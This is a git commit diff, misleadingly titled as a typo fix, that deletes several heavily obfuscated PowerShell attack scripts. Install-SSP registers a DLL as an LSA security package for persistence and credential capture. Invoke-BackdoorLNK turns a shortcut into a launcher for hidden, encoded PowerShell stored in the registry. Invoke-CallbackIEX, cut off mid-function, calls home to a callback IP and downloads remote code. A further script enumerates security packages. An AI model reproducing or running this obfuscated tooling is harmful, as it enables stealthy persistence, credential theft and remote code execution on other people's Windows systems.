Remove spelling typo
parent
34ee7ad1ed
commit
5308840474
@ -1,114 +0,0 @@
|
|||
SeT 8i53f ( [tYpe]("{0}{1}{2}{3}"-f'Appd','O','mA','In')) ; sET-itEM ('VAR'+'Iab'+'Le:4O'+'TI'+'R') ([tYpE]("{5}{3}{6}{1}{0}{7}{2}{4}"-F'sEmbl','It.as','UildEracC','E','Ess','R','flECTIoN.em','YB')) ; SEt-item VAriabLE:Tn86A ( [typE]("{0}{1}{3}{2}"-F 'fLA','gs','E','atTRiBUT') ) ; Set-itEm ("vARIABlE:w"+"2"+"i") ( [tYPe]("{3}{5}{6}{4}{2}{1}{0}" -f'NgsiZe','ki','PAC','reFL','it.','ECT','ioN.eM') ) ; $TDcp81= [TyPe]("{8}{4}{6}{1}{0}{7}{2}{3}{5}" -F'aLlI','n.C','nvEn','Ti','i','Ons','O','NgCo','ReFlEct'); SeT-ITeM vaRiAbLE:xGL ( [TyPE]("{1}{0}"-f 'nt32','i') ) ; $liW9 = [TyPE]("{11}{3}{2}{5}{1}{8}{6}{4}{9}{7}{10}{0}"-F 'IoN','.','Nti','U','l','Me','TeroPseRvICes.Ca','Ng','IN','li','cONvEnT','r'); sv x8o ( [TypE]("{4}{6}{7}{1}{5}{3}{2}{0}" -F 'ArsEt','Inte','.Ch','Es','RUnt','ropsERVIC','im','e.') ) ; $UmdQ8=[tYPE]("{1}{0}" -f 'tR','iNtp') ; $EHv6mU =[TYPe]("{4}{2}{8}{0}{7}{1}{5}{3}{6}" -F'S','Ces','me.Int','s','ruNTi','.maR','haL','erVi','ErOp') ; function Ge`T-s`ecURi`TyPac`KaG`es
|
||||
{
|
||||
|
||||
|
||||
[CmdletBinding()] Param()
|
||||
|
||||
|
||||
${DYn`ASsEmb`ly} = New-Object ("{0}{1}{5}{3}{4}{2}"-f'S','yste','me','mblyN','a','m.Reflection.Asse')('SSPI')
|
||||
${ASsem`B`Ly`BuilDeR} = ( GI VARIable:8i53f)."v`ALUe"::"CURrENt`Do`M`AIn"."dEF`I`Ne`d`Yna`MiC`AsSemBly"(${dy`NaSs`eMBLy}, $4oTir::"r`Un")
|
||||
${M`OduLebu`IL`D`Er} = ${aSS`EmBlY`BU`iLd`er}."DEf`in`eDyNAMi`CmodU`le"('SSPI', ${fal`SE})
|
||||
|
||||
${fl`A`gs`c`oNSTRuCtOR} = $tN86A."gE`T`ConStR`uC`ToR"(@())
|
||||
${f`LAG`sC`Us`To`Ma`TTRIBute} = New-Object ("{3}{4}{0}{10}{1}{9}{7}{8}{6}{5}{2}"-f'le','ion.Emi','r','Re','f','Builde','te','.C','ustomAttribu','t','ct')(${f`lA`gS`cO`NsTRU`CtoR}, @())
|
||||
${STrucT`A`T`Tr`IBuT`es} = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
|
||||
|
||||
${e`NumB`UILDer} = ${MO`duleBU`IL`DER}."D`ef`inE`eNum"('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
||||
${E`NuMBUi`l`deR}."sETCU`sToM`AtTRibu`TE"(${Fl`AgS`CUStOmat`T`Ri`BUTe})
|
||||
${n`ULL} = ${enumB`Ui`lD`er}."def`ine`LiTeRaL"('INTEGRITY', 1)
|
||||
${N`uLL} = ${enUmb`uILD`Er}."D`ef`In`EL`itERal"('PRIVACY', 2)
|
||||
${N`uLl} = ${enuM`Bu`iL`Der}."dEfIneLITE`R`AL"('TOKEN_ONLY', 4)
|
||||
${N`uLL} = ${E`NuMbuI`ldER}."DEFiNEL`Iter`AL"('DATAGRAM', 8)
|
||||
${n`ULL} = ${en`umbUi`l`dER}."def`IN`ElITErAl"('CONNECTION', 0x10)
|
||||
${nU`lL} = ${EN`umBU`Il`Der}."d`EfinEL`iT`eRAl"('MULTI_REQUIRED', 0x20)
|
||||
${nU`lL} = ${e`NUMbUiLD`ER}."DeF`IN`eliTeRAL"('CLIENT_ONLY', 0x40)
|
||||
${NU`ll} = ${e`NUm`BUi`LdeR}."DEfin`el`i`TerAL"('EXTENDED_ERROR', 0x80)
|
||||
${Nu`ll} = ${EnU`mBUil`D`ER}."dEfi`NELi`TeR`Al"('IMPERSONATION', 0x100)
|
||||
${nu`ll} = ${e`NumbU`iLd`ER}."DefIN`e`liTERal"('ACCEPT_WIN32_NAME', 0x200)
|
||||
${N`Ull} = ${ENu`MbUiLD`ER}."DeFINe`LIT`e`RAL"('STREAM', 0x400)
|
||||
${nU`LL} = ${E`NUmBuil`DER}."d`E`F`InELITERaL"('NEGOTIABLE', 0x800)
|
||||
${N`ULL} = ${EnUM`Bu`i`ldEr}."dE`FINE`LITeRaL"('GSS_COMPATIBLE', 0x1000)
|
||||
${nU`Ll} = ${enuMb`uILD`eR}."DefiNElITE`R`Al"('LOGON', 0x2000)
|
||||
${nU`ll} = ${EnU`Mb`u`ilder}."d`eFiNe`lIt`ErAl"('ASCII_BUFFERS', 0x4000)
|
||||
${NU`Ll} = ${en`UMBuil`DER}."DE`FinE`Lit`erAl"('FRAGMENT', 0x8000)
|
||||
${n`ULL} = ${E`NumB`uI`lder}."dEf`inElit`Eral"('MUTUAL_AUTH', 0x10000)
|
||||
${NU`LL} = ${E`NuMbUIL`D`er}."dEfiNEL`I`TE`RaL"('DELEGATION', 0x20000)
|
||||
${N`ulL} = ${en`uMbuI`LDER}."DefIn`El`iTeRAl"('READONLY_WITH_CHECKSUM', 0x40000)
|
||||
${n`ULL} = ${EN`uM`BuIl`DeR}."deFI`NEl`Ite`RaL"('RESTRICTED_TOKENS', 0x80000)
|
||||
${n`uLL} = ${enU`mbu`ILD`Er}."De`FInel`iteR`AL"('NEGO_EXTENDER', 0x100000)
|
||||
${Nu`ll} = ${EN`Um`BuILD`Er}."D`eFIN`eL`ITeRAl"('NEGOTIABLE2', 0x200000)
|
||||
${n`ULL} = ${eN`um`BUILdeR}."D`EfINe`lItERAl"('APPCONTAINER_PASSTHROUGH', 0x400000)
|
||||
${n`ull} = ${ENuMBU`I`lDeR}."d`EfIn`eLi`Te`RAL"('APPCONTAINER_CHECKS', 0x800000)
|
||||
${se`C`PKg_`FLag} = ${EnuM`B`UILdEr}."cReATET`y`pE"()
|
||||
|
||||
${tYp`eBuiL`Der} = ${M`o`d`UL`ebUILDEr}."DE`Fi`NETYpe"('SSPI.SecPkgInfo', ${sTRUC`Ta`TTrIBuT`es}, [Object], (get-VArIAbLE ('W2'+'i') -vAl )::"siZ`e8")
|
||||
${N`ulL} = ${ty`Pebui`LDEr}."d`eF`IN`eFIelD"('fCapabilities', ${S`EC`PKg_FL`AG}, 'Public')
|
||||
${NU`Ll} = ${t`y`peBu`ILder}."De`FiN`e`FieLD"('wVersion', [Int16], 'Public')
|
||||
${Nu`lL} = ${T`yP`E`BUIldER}."De`FInEFI`Eld"('wRPCID', [Int16], 'Public')
|
||||
${N`UlL} = ${typE`BuIL`dER}."D`eFI`NEFIElD"('cbMaxToken', [Int32], 'Public')
|
||||
${n`Ull} = ${T`ypEBu`il`DER}."DE`FiN`EF`iELD"('Name', [IntPtr], 'Public')
|
||||
${Nu`ll} = ${T`YpE`BUild`ER}."d`e`FInEfieLD"('Comment', [IntPtr], 'Public')
|
||||
${S`e`CpKG`INFo} = ${tyPebUI`l`d`eR}."c`R`eaTETyPE"()
|
||||
|
||||
${tyPe`BUi`ldeR} = ${m`Odulebui`l`der}."D`efIne`TYPe"('SSPI.Secur32', 'Public, Class')
|
||||
${piNvo`kE`me`T`hOD} = ${TYpE`B`uildER}."de`F`iNEp`i`NvokeMethod"('EnumerateSecurityPackages',
|
||||
'secur32.dll',
|
||||
'Public, Static',
|
||||
( geT-iTeM ('vARiaBL'+'E:tD'+'cP8'+'1') )."v`AlUe"::"s`T`Andard",
|
||||
[Int32],
|
||||
[Type[]] @( ( get-VARiaBlE XgL )."V`AlUE"."maKE`BYrEfT`YPE"(),
|
||||
( VARiabLE ("U"+"mDQ8") )."va`LuE"."MAKe`BYR`E`FTypE"()),
|
||||
(Item ('v'+'A'+'RiaBL'+'E:lIW9'))."vAl`UE"::"wI`NAPI",
|
||||
(VaRIaBLE X8o -VaL )::"A`NsI")
|
||||
|
||||
${s`e`CUR32} = ${typ`Ebu`iLdEr}."crEA`T`e`TYpe"()
|
||||
|
||||
${PAC`kAGEc`ount} = 0
|
||||
${PAcK`AgeARraY`P`Tr} = ( GET-varIablE ("UMdQ"+"8") )."v`Alue"::"zE`Ro"
|
||||
${r`e`sUlT} = ${sEC`uR`32}::"EnU`m`E`RATeS`e`cU`RitY`pACKAGEs"([Ref] ${p`AckagE`couNt}, [Ref] ${p`ACkAGE`AR`RAypTr})
|
||||
|
||||
if (${R`E`Sult} -ne 0)
|
||||
{
|
||||
throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"
|
||||
}
|
||||
|
||||
if (${pA`CkA`ge`cOUnt} -eq 0)
|
||||
{
|
||||
Write-Verbose 'There are no installed security packages.'
|
||||
return
|
||||
}
|
||||
|
||||
${s`T`RucTaDdRe`SS} = ${paCK`A`GeaRr`AyPtr}
|
||||
|
||||
foreach (${I} in 1..${PaC`kAgec`O`u`Nt})
|
||||
{
|
||||
${SeCpaC`kagES`T`R`u`Ct} = ( gi ('VARIa'+'bLe:EhV6'+'M'+'u'))."V`AluE"::"PTrt`osTr`uctu`Re"(${s`TRU`cT`ADd`REsS}, [Type] ${SECP`KG`infO})
|
||||
${STR`ucT`ADDRE`Ss} = [IntPtr] (${sTRUc`TaddrE`Ss}."TO`INt64"() + $ehV6Mu::"SiZE`OF"([Type] ${se`C`Pkg`INFo}))
|
||||
|
||||
${na`ME} = ${NU`LL}
|
||||
|
||||
if (${seCP`Ac`KaGeS`TrU`ct}."n`AME" -ne (dIR ('varI'+'A'+'ble'+':'+'uMdq8'))."VAl`uE"::"ze`Ro")
|
||||
{
|
||||
${n`Ame} = (geT-cHiLdiTEM ("vaRIabl"+"e:e"+"H"+"V6mu"))."V`AluE"::"p`TRt`ostRiNg`A`NSI"(${s`eCpack`AGeSTR`UCt}."na`Me")
|
||||
}
|
||||
|
||||
${C`Omm`eNt} = ${N`UlL}
|
||||
|
||||
if (${S`Ec`P`ACkA`GeStru`ct}."COmm`ent" -ne ( gi ("vaRI"+"ab"+"Le"+":UMd"+"Q8") )."VAL`UE"::"Z`ERO")
|
||||
{
|
||||
${C`oMMeNt} = (varIAbLE Ehv6mu )."va`LUE"::"PTR`T`oSTr`InGan`SI"(${SE`C`pacK`AGE`St`RUcT}."cOMmE`NT")
|
||||
}
|
||||
|
||||
${AT`TrIbUt`Es} = @{
|
||||
"nA`me" = ${Na`ME}
|
||||
"Co`MmeNT" = ${c`omme`Nt}
|
||||
"Cap`Abil`iTI`es" = ${s`E`CP`AcKAG`ES`TrucT}."FCaP`Ab`Il`IT`iES"
|
||||
"MA`Xto`KenSiZe" = ${seCp`Ac`K`A`GestRUCT}."C`BM`AxToKen"
|
||||
}
|
||||
|
||||
${SE`cP`AcKA`GE} = New-Object ("{2}{1}{0}"-f 't','c','PSObje') -Property ${A`TT`R`iBUteS}
|
||||
${sECpacK`A`Ge}."PS`o`Bject"."Typ`e`NamEs"[0] = 'SECUR32.SECPKGINFO'
|
||||
|
||||
${Sec`pACka`ge}
|
||||
}
|
||||
}
|
|
@ -1,171 +0,0 @@
|
|||
${Y`cDt} = [tYpe]("{4}{3}{6}{7}{5}{1}{0}{2}" -f'en','pal.windowSId','Tity','ecuR','S','CI','I','TY.pRin') ; Set-vaRIAbLE ("{1}{0}" -f'rj','f') ( [tYpe]("{0}{2}{6}{1}{7}{4}{3}{8}{5}"-f 'S','Y.PrInCI','eCuRi','bUIL','Ows','LE','T','pal.WINd','tINro') ) ; ${X`kW} = [tYPe]("{2}{1}{3}{0}" -F'IlemOdE','StEM','Sy','.io.f') ; sV ('x1'+'uO') ( [TYPE]("{0}{4}{2}{6}{1}{3}{5}" -F'SyStEM','c','.fiLe','C','.iO','Ess','A')) ; Set-IteM ("varIaBLe:u"+"W"+"b") ( [TYpe]("{1}{0}{4}{3}{2}"-f'.','sySTEm','Ng','OdI','TeXt.asCiienc') ) ;${60Oc} = [TYpE]("{6}{2}{1}{3}{4}{0}{5}"-f'koRig','M.io.S','te','e','E','iN','SYs'); sV ('yAp'+'vd') ( [TyPE]("{2}{1}{0}"-F'MaIN','dO','App') ) ; ${8d`B6O5}=[TYpE]("{1}{3}{6}{2}{0}{4}{5}" -f 'emBlybu','Ref','.ASS','LE','IlD','ERACCESS','CTIon.emit'); Set-ITEm ("vAr"+"Iable:"+"T"+"8Cg") ([TyPe]("{3}{5}{7}{0}{6}{4}{8}{2}{1}"-f 'o','onS','TI','Ref','al','lECT','n.c','I','lINgcoNVEn') ) ; SET-vAriAbLe ("{0}{1}" -f '0','zs') ( [type]("{2}{7}{0}{6}{5}{1}{3}{4}"-f'Me.','eRvIce','rUn','S.CaLlI','NgcONVEnTIoN','Terops','IN','TI') ); SEt ("{0}{1}" -f 'N','5m') ( [tYPE]("{0}{5}{4}{6}{8}{2}{7}{3}{1}"-F'ru','harSEt','PserV','.C','tIM','N','E.','IcES','iNTERo') ) ;${c`7fb`dZ} = [TyPE]("{0}{2}{1}"-F 'I','TPtr','n');${6`O0hvP}= [TYPE]("{3}{0}{2}{5}{1}{7}{4}{6}" -f'u','in','NtIme','R','icES.MaRshA','.','l','teropSerV') ;function INStAl`l-`S`sP
|
||||
{
|
||||
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[ValidateScript({Test-Path (Resolve-Path ${_})})]
|
||||
[String]
|
||||
${p`Ath}
|
||||
)
|
||||
|
||||
${PrI`N`ciPaL} = [Security.Principal.WindowsPrincipal] ${yc`dt}::"G`EtCuRRe`Nt"()
|
||||
|
||||
if(-not ${P`RI`NC`IPal}."I`SinRolE"( (GI ("{3}{0}{2}{1}" -f 'ARi','Le:frj','ab','V')).VAlUe::"Adm`I`NisTR`At`OR"))
|
||||
{
|
||||
throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'
|
||||
}
|
||||
|
||||
|
||||
${FUlLDLl`p`A`Th} = Resolve-Path ${Pa`TH}
|
||||
|
||||
|
||||
function LOCAl:g`Et-peaRcHItE`C`TU`Re
|
||||
{
|
||||
Param
|
||||
(
|
||||
[Parameter( pOsITion = 0,
|
||||
MandATory = ${TR`Ue} )]
|
||||
[String]
|
||||
${pA`Th}
|
||||
)
|
||||
|
||||
|
||||
${Fil`e`S`TreaM} = New-Object ("{3}{0}{1}{2}{4}" -f 's','tem.I','O.FileS','Sy','tream')(${Pa`Th}, ${X`KW}::"Op`eN", (gi ('Va'+'r'+'iaB'+'lE'+':x1uO')).vALUe::"rE`Ad")
|
||||
|
||||
[Byte[]] ${m`zHe`A`der} = New-Object ("{0}{1}" -f 'Byte','[]')(2)
|
||||
${F`IL`eS`TrEAM}."RE`AD"(${m`Zhe`ADER},0,2) | Out-Null
|
||||
|
||||
${h`EA`dER} = ( childITEM ("VarIabLE:u"+"w"+"B") ).VaLue::"aS`CII"."gEt`StRi`Ng"(${M`ZHEad`ER})
|
||||
if (${hE`AdEr} -ne 'MZ')
|
||||
{
|
||||
${F`IlE`sTRe`AM}."cLo`se"()
|
||||
Throw 'Invalid PE header.'
|
||||
}
|
||||
|
||||
|
||||
${Fi`lEST`REAM}."S`eeK"(0x3c, ( geT-ChilDItem ("{1}{0}{3}{4}{2}" -f 'Le','VARIAB','C',':','60O')).Value::"BE`GIn") | Out-Null
|
||||
|
||||
[Byte[]] ${L`FaN`EW} = New-Object ("{1}{0}"-f ']','Byte[')(4)
|
||||
|
||||
|
||||
${F`IlEs`TreAm}."RE`AD"(${Lf`AnEw},0,4) | Out-Null
|
||||
${PEoF`FS`et} = [Int] ('0x{0}' -f (( ${l`F`AnEW}[-1..-4] | % { ${_}."tOst`R`ING"('X2') } ) -join ''))
|
||||
|
||||
|
||||
${FIl`eStrE`AM}."se`ek"(${pE`o`FFSEt} + 4, ( Ls ("v"+"aRIAb"+"L"+"e:60OC") ).ValUe::"b`eGin") | Out-Null
|
||||
[Byte[]] ${i`mAGE_`File_`m`ACh`iNe} = New-Object ("{2}{0}{1}" -f'e[',']','Byt')(2)
|
||||
|
||||
|
||||
${FI`Les`TRE`Am}."rE`AD"(${ImAGe_`File`_`M`Ach`Ine},0,2) | Out-Null
|
||||
${aRch`ITeC`T`URE} = '{0}' -f (( ${ImaGe_`FiL`E`_mACHiNe}[-1..-2] | % { ${_}."Tost`RInG"('X2') } ) -join '')
|
||||
${FI`LESt`Ream}."Cl`ose"()
|
||||
|
||||
if ((${A`RcHi`TeCtu`RE} -ne '014C') -and (${aRC`hiteCT`uRe} -ne '8664'))
|
||||
{
|
||||
Throw 'Invalid PE header or unsupported architecture.'
|
||||
}
|
||||
|
||||
if (${ARcHi`TECTu`Re} -eq '014C')
|
||||
{
|
||||
Write-Output '32-bit'
|
||||
}
|
||||
elseif (${archIT`ec`TUre} -eq '8664')
|
||||
{
|
||||
Write-Output '64-bit'
|
||||
}
|
||||
else
|
||||
{
|
||||
Write-Output 'Other'
|
||||
}
|
||||
}
|
||||
|
||||
${DL`larchiT`Ec`TUre} = Get-PEArchitecture ${fu`L`ld`LlPath}
|
||||
|
||||
${OS`ARcH} = Get-WmiObject ("{1}{6}{3}{2}{0}{5}{4}" -f 'erating','Wi','Op','2_','tem','Sys','n3') | Select-Object -ExpandProperty ("{0}{2}{1}"-f'O','ture','SArchitec')
|
||||
|
||||
if (${d`ll`ArcH`itE`CTURE} -ne ${O`SArcH})
|
||||
{
|
||||
throw 'The operating system architecture must match the architecture of the SSP dll.'
|
||||
}
|
||||
|
||||
${D`Ll} = Get-Item ${FULl`D`LlP`ATH} | Select-Object -ExpandProperty ("{1}{0}" -f 'e','Nam')
|
||||
|
||||
|
||||
|
||||
${dLl`N`Ame} = ${D`ll} | % { % {(${_} -split '\.')[0]} }
|
||||
|
||||
|
||||
${sec`urI`Typa`ck`AgES} = Get-ItemProperty (("{8}{2}{10}{6}{5}{4}{12}{11}{1}{7}{0}{3}{9}" -f 'olSet','n','M:rAUSYST','rAUCon','r','UCu','MrA','tr','HKL','trolrAULsa','E','ntCo','re')).REPLacE('rAU','\') -Name 'Security Packages' |
|
||||
Select-Object -ExpandProperty 'Security Packages'
|
||||
|
||||
if (${SeCUR`ITy`p`AcK`A`gEs} -contains ${dLlN`A`me})
|
||||
{
|
||||
throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."
|
||||
}
|
||||
|
||||
|
||||
${N`ATive`I`NStA`L`lDir} = "$($Env:windir)\Sysnative"
|
||||
|
||||
if (Test-Path ${NatIVe`iNsta`l`LdIR})
|
||||
{
|
||||
${iNst`AL`lD`Ir} = ${nativ`eI`Ns`TalLDIR}
|
||||
}
|
||||
else
|
||||
{
|
||||
${iNSta`l`l`dIR} = "$($Env:windir)\System32"
|
||||
}
|
||||
|
||||
if (Test-Path (Join-Path ${iNstA`L`LD`IR} ${d`ll}))
|
||||
{
|
||||
throw "$Dll is already installed in $InstallDir."
|
||||
}
|
||||
|
||||
|
||||
Copy-Item ${ful`L`dlLp`AtH} ${INStAll`D`Ir}
|
||||
|
||||
${S`ecuRit`ypAcKA`gES} += ${dl`L`Name}
|
||||
|
||||
Set-ItemProperty ((("{1}{8}{0}{4}{2}{9}{5}{6}{7}{10}{3}" -f 'Y','HKLM:','QD1CurrentContro','1Lsa','STEM','etQ','D1Contro','lQ','QD1S','lS','D')) -cRePLace 'QD1',[cHAR]92) -Name 'Security Packages' -Value ${SEC`U`RityP`ACkages}
|
||||
|
||||
${DYnaS`S`eMblY} = New-Object ("{0}{1}{7}{4}{2}{5}{6}{3}" -f 'S','yste','e','Name','R','flecti','on.Assembly','m.')('SSPI2')
|
||||
${assE`M`BLyBUil`Der} = ${yAP`Vd}::"CU`Rre`NtDoma`IN"."de`FI`NED`y`NAmIcaS`semb`LY"(${dyna`S`Sem`BLY}, ( DiR ("{0}{1}{3}{2}{4}" -f'vaR','iAb','8d','le:','B6o5') ).vALUe::"r`uN")
|
||||
${M`odULebUi`lder} = ${Assem`B`LYbu`I`LDEr}."deF`inEDyna`mI`cmOD`u`LE"('SSPI2', ${faL`sE})
|
||||
|
||||
${Ty`PebuILD`er} = ${MODUL`eBU`Il`DER}."De`F`inE`TYpe"('SSPI2.Secur32', 'Public, Class')
|
||||
${PIn`V`OKE`m`eTHOD} = ${TY`pEbuiL`deR}."De`FinePINvo`kEm`E`THoD"('AddSecurityPackage',
|
||||
'secur32.dll',
|
||||
'Public, Static',
|
||||
${T8`Cg}::"stA`ND`ARD",
|
||||
[Int32],
|
||||
[Type[]] @([String], [IntPtr]),
|
||||
( gET-VarIABle ("{1}{0}" -f 'ZS','0') -ValUeonl )::"WInA`PI",
|
||||
${n`5M}::"AU`TO")
|
||||
|
||||
${S`Ecu`R32} = ${TYp`e`BUI`lDEr}."C`REaTET`YpE"()
|
||||
|
||||
if ( ( vaRiAble ('c'+'7FbDZ') ).VAlUe::"S`Ize" -eq 4) {
|
||||
${S`Tructs`i`ZE} = 20
|
||||
} else {
|
||||
${S`TrucTs`ize} = 24
|
||||
}
|
||||
|
||||
${S`T`RUctpTr} = ( gI ("{1}{4}{3}{0}{2}"-f '0','v','hVp','BlE:6O','ARIa') ).VALUE::"AL`lo`cHgLObal"(${str`Uct`SIzE})
|
||||
( chILDITeM ("{2}{1}{0}{3}"-f'O0H','riaBLE:6','VA','VP') ).Value::"wrIT`e`iNt32"(${st`R`u`CTptr}, ${sTru`C`TSI`Ze})
|
||||
|
||||
${runTI`M`eSUC`Ce`SS} = ${t`Rue}
|
||||
|
||||
try {
|
||||
${rE`SU`lt} = ${s`Ec`ur32}::"AddS`E`c`U`RitypAck`Age"(${dLl`N`AME}, ${STRuC`T`pTR})
|
||||
} catch {
|
||||
${hR`e`sult} = ${er`ROR}[0]."Excep`Ti`ON"."I`NnE`R`eXCePT`ioN"."HrESU`LT"
|
||||
Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
|
||||
Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
|
||||
${RUN`TiMES`Uc`cE`SS} = ${f`AlsE}
|
||||
}
|
||||
|
||||
if (${Ru`NT`iMESU`cCEsS}) {
|
||||
Write-Verbose 'Installation and loading complete!'
|
||||
} else {
|
||||
Write-Verbose 'Installation complete! Reboot for changes to take effect.'
|
||||
}
|
||||
}
|
|
@ -1,76 +0,0 @@
|
|||
${0`4Dp}= [tYpe]("{0}{2}{4}{3}{1}" -F'sys','ding','teM.TE','ENCo','xt.') ; ${x`8Yn9} = [typE]("{0}{4}{3}{2}{1}"-F 'Sy','t','NVer','Tem.Co','S'); function iN`VOKe-BaCkdoO`Rl`NK {
|
||||
|
||||
|
||||
[CmdletBinding()] Param(
|
||||
[Parameter(vaLueFrOMPIPeLINe=${T`Rue}, MAnDAtory = ${t`RuE})]
|
||||
[ValidateScript({Test-Path -Path ${_} })]
|
||||
[String]
|
||||
${l`NkpATh},
|
||||
|
||||
[String]
|
||||
${ENcs`cr`IpT},
|
||||
|
||||
[String]
|
||||
${rEG`pA`TH} = 'HKCU:\Software\Microsoft\Windows\debug',
|
||||
|
||||
[Switch]
|
||||
${C`LEANUp}
|
||||
)
|
||||
|
||||
${ReG`pa`Rts} = ${REG`pA`TH}."sp`LIT"("\")
|
||||
${PA`Th} = ${r`e`GpaRtS}[0..(${r`EGp`Ar`TS}."c`OUnt"-2)] -join "\"
|
||||
${N`AmE} = ${RE`Gp`ArTS}[-1]
|
||||
|
||||
|
||||
${o`Bj} = New-Object -ComObject ("{0}{2}{1}"-f'WScri','ll','pt.She')
|
||||
${l`Nk} = ${o`Bj}."crE`At`esHo`Rtcut"(${LNK`pa`Th})
|
||||
|
||||
|
||||
${Targ`e`T`patH} = ${L`NK}."tA`RgE`TpA`Th"
|
||||
${W`Ork`iN`g`DIRECTory} = ${l`NK}."WOrkING`DIr`Ec`T`oRy"
|
||||
${icOn`LOCat`Ion} = ${L`NK}."Ic`oN`LO`cATION"
|
||||
|
||||
if(${CL`eAnUp}) {
|
||||
|
||||
|
||||
${ORIg`I`NAl`p`ATh} = (${ic`onl`o`caTiOn} -split ",")[0]
|
||||
|
||||
${l`NK}."tArg`eTPA`Th" = ${ORiGI`NALP`ATh}
|
||||
${L`Nk}."ArgU`m`ents" = ${Nu`LL}
|
||||
${l`NK}."w`ind`o`wstylE" = 1
|
||||
${L`Nk}."s`AvE"()
|
||||
|
||||
|
||||
${N`uLL} = Remove-ItemProperty -Force -Path ${Pa`Th} -Name ${N`AmE}
|
||||
}
|
||||
else {
|
||||
|
||||
if(!${enC`scr`ipt} -or ${e`N`cSC`RIpT} -eq '') {
|
||||
throw "-EncScript or -Cleanup required!"
|
||||
}
|
||||
|
||||
|
||||
${Nu`Ll} = Set-ItemProperty -Force -Path ${p`ATH} -Name ${N`AMe} -Value ${en`CSCRI`PT}
|
||||
|
||||
"[*] B64 script stored at '$RegPath'`n"
|
||||
|
||||
|
||||
${L`Nk}."Ta`RGEtpa`TH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
|
||||
|
||||
|
||||
${L`A`uNch`StR`iNG} = '[System.Diagnostics.Process]::Start("'+${T`ArGetp`AtH}+'");IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp '+${P`AtH}+' '+${nA`Me}+').'+${na`ME}+')))'
|
||||
|
||||
${LAU`N`c`HBYteS} = ( cHiLdITem ("{4}{3}{2}{0}{1}"-f'4','dP',':0','iaBLE','VaR') )."v`Alue"::"UN`icode"."gETB`Y`TEs"(${LAun`cH`STRI`Ng})
|
||||
${laUnC`H`B64} = ( dIr ("v"+"ar"+"iABLE:x8y"+"N9") )."v`ALuE"::"T`OBAse`64STri`Ng"(${LaU`Nchby`T`es})
|
||||
|
||||
${L`Nk}."a`Rg`UMEnts" = "-w hidden -nop -enc $LaunchB64"
|
||||
|
||||
|
||||
${L`Nk}."WorK`INGdIR`e`C`ToRY" = ${W`oR`KInGdIrEc`TORy}
|
||||
${l`Nk}."I`c`OnLocA`TION" = "$TargetPath,0"
|
||||
${l`Nk}."wIN`dow`STy`le" = 7
|
||||
${L`NK}."SA`VE"()
|
||||
|
||||
"[*] .LNK at $LNKPath set to trigger`n"
|
||||
}
|
||||
}
|
|
@ -1,583 +0,0 @@
|
|||
$5kzyIT = [TYpE]("{4}{0}{1}{2}{3}" -F'e','t.SErV','I','CEPoinTmanAGeR','sySTem.n') ; $nzV2aP =[tyPe]("{1}{3}{2}{4}{0}"-F 'Rt','SYs','n','tEm.Co','vE') ; seT ('T'+'1o5') ( [Type]("{0}{3}{1}{2}" -f'sysTEM.T','nC','oding','exT.e') ) ;SeT-ITEM ("{3}{2}{0}{1}{4}" -f':Tr','i','bLe','varIa','XE') ( [tYPe]("{0}{3}{2}{1}"-F'sysTEm','s','.Dn','.neT') ) ; seT ("ZN"+"u") ( [type]("{2}{1}{3}{4}{5}{0}{6}" -F 't','ecURitY.PRiNC','s','ipAL.wInDoWs','ID','en','itY')) ; SET-itEm ("VArIABle"+":q8WgP"+"c") ( [TypE]("{0}{1}"-f'rE','gEX')) ; Sv ("{1}{0}" -f 'iUY','l8f') ([typE]("{3}{2}{4}{1}{0}" -f 'EtS.aDDReSsFaMIlY','K','t','NE','.SOc'));sEt-iteM ("{0}{3}{2}{1}"-f 'vaRiAb','pVj','4','lE:26') ( [typE]("{0}{5}{2}{4}{3}{1}"-F'nET.S','kettYpE','cKeTS.','Oc','s','o') ) ; SEt-IteM ("{2}{0}{3}{1}"-f 'blE','ACs','VArIa',':E') ([TYPE]("{2}{4}{3}{6}{1}{5}{0}{7}" -F'lT','o','neT.sO','KeT','c','TOcO','S.Pr','yPE') ); set-iTEM ("{3}{2}{0}{1}" -f 'bLE:','jMHB','aRiA','v') ([TYpE]("{1}{6}{2}{3}{5}{4}{0}" -F'e','NET','SOCkeTS','.IOCOnt','D','rOLCO','.')) ; sET-ITem ("vA"+"rIabLE:y"+"4"+"h"+"br") ( [tYpe]("{0}{1}{3}{4}{2}"-f 'NeT.SO','CKeTs.socKETFL','S','A','G')); Sv ("I6S"+"5nr") ( [tYpE]("{0}{1}{2}"-f'daT','ET','Ime'));
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function iNv`okE-Ca`LlbAck`IEx
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(mANDatOry=${Tr`uE},poSitION=1)]
|
||||
[string]${cAl`l`BAcKip},
|
||||
[Parameter(mandatoRy=${Fa`LSE},poSitIoN=2)]
|
||||
[int]${me`T`hOD}=0,
|
||||
[Parameter(MAndaToRy=${F`AlSE},posITION=3)]
|
||||
[string]${bI`TSt`eMPFi`Le}="$env:temp\ps_conf.cfg",
|
||||
[Parameter(mANDAtOrY=${F`ALse},POsiTIoN=4)]
|
||||
[string]${R`E`SouRCe}="/favicon.ico",
|
||||
[Parameter(MaNDaTory=${FA`lsE},POsITIon=5)]
|
||||
[bool]${sI`lENT}=${f`A`lSE}
|
||||
)
|
||||
|
||||
|
||||
if(${c`All`Ba`ckIP})
|
||||
{
|
||||
try {
|
||||
|
||||
if (${Met`H`OD} -eq 0)
|
||||
{
|
||||
|
||||
${u`RL}="http://$CallbackIP$resource"
|
||||
if(-not ${SiL`enT}) {write-host "Calling home with method $method to: $url"}
|
||||
|
||||
${e`NC} = (new-object ("{2}{0}{1}"-f 't','.webclient','ne'))."dOwn`loA`D`String"(${U`Rl})
|
||||
}
|
||||
|
||||
elseif (${meT`h`od} -eq 1)
|
||||
{
|
||||
